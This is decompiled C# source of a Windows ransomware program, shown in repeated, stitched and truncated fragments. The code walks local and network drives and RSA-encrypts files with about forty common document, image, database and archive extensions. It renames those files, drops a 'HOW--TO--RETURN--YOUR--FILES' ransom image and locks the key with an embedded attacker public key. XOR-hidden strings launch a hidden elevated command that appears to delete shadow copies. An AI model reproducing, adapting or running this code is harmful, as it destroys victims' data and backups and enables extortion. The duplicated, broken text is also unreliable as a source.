new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 